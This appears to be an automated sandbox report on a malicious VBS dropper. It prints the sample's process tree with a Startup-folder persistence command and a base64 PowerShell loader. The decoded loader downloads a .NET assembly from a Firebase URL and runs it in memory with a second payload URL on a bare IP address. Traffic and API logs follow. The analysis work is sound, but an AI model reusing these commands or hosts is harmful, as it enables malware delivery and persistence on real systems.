Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 21, 2023, 6:10 p.m.	Sept. 21, 2023, 6:18 p.m.

Size	206.5KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`878b00995ad5c6ab937cbab9e9b40c06`
SHA256	`3fe7fcdfcb71ba792724d2734e0ae41db3c27880bf0c7ddb664b11baa8a9cc03`
CRC32	`4E55D282`
ssdeep	`6144:R9od/r+GF18Z8S8Q8s8P838f8M8x8K8G8W808o8XUnX3JTVrAq:0r+GFmX3JTVrAq`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs
840
- cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
  2072
  - PING.EXE ping 127.0.0.1 -n 5
    2132
  - cmd.exe cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
    2248
    - powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')
      2300
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
  2424
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
    2516
    - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2868

Name	Response	Post-Analysis Lookup
firebasestorage.googleapis.com	A 142.250.204.42 A 142.251.222.202 A 172.217.27.42 A 172.217.24.234 A 142.250.204.74 A 172.217.31.10 A 142.250.207.74 A 172.217.27.10 A 142.250.66.74 A 142.250.66.106 A 142.250.204.106 A 142.250.66.42 A 142.250.199.74 A 172.217.24.106 A 172.217.25.10 A 142.250.66.138	142.250.206.202

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.31.10	Active	Moloch
198.46.178.152	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49170 -> 172.217.31.10:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 198.46.178.152:80 -> 192.168.56.103:49171	2020425	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1	Exploit Kit Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49170 172.217.31.10:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	be:40:3a:a6:de:cc:a7:8b:75:43:68:f2:f9:56:63:71:49:61:06:49

Queries for the computername (23 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 21, 2023, 6:11 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 21, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Sept. 21, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Sept. 21, 2023, 6:10 p.m.			0	0
IsDebuggerPresent Sept. 21, 2023, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 21, 2023, 6:11 p.m.			0	0

Command line console output was observed (24 events)

Time & API	Arguments	Status	Return
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 5, Received = 5, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA Sept. 21, 2023, 6:10 p.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 120 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323750 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323310 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b8d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b8d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b8d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 21, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 21, 2023, 6:10 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 21, 2023, 6:11 p.m.	stacktrace: 0x8f0a1c 0x8f09a6 0x8f07ed 0x8f0070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x740cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8f3d05 registers.esp: 1437300 registers.edi: 1437324 registers.eax: 0 registers.ebp: 1437336 registers.edx: 195 registers.ebx: 41535288 registers.esi: 41539248 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 21, 2023, 6:11 p.m.

stacktrace:

0x8f0a1c
0x8f09a6
0x8f07ed
0x8f0070
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x740cf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8f3d05
registers.esp: 1437300
registers.edi: 1437324
registers.eax: 0
registers.ebp: 1437336
registers.edx: 195
registers.ebx: 41535288
registers.esi: 41539248
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://198.46.178.152/88/Runtime.txt
suspicious_features	GET method with no useragent header				suspicious_request	GET https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a

Performs some HTTP requests (2 events)

request	GET http://198.46.178.152/88/Runtime.txt
request	GET https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a

Allocates read-write-execute memory (usually to unpack itself) (50 out of 483 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02452000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02463000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 21, 2023, 6:10 p.m.	process_identifier: 2300 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
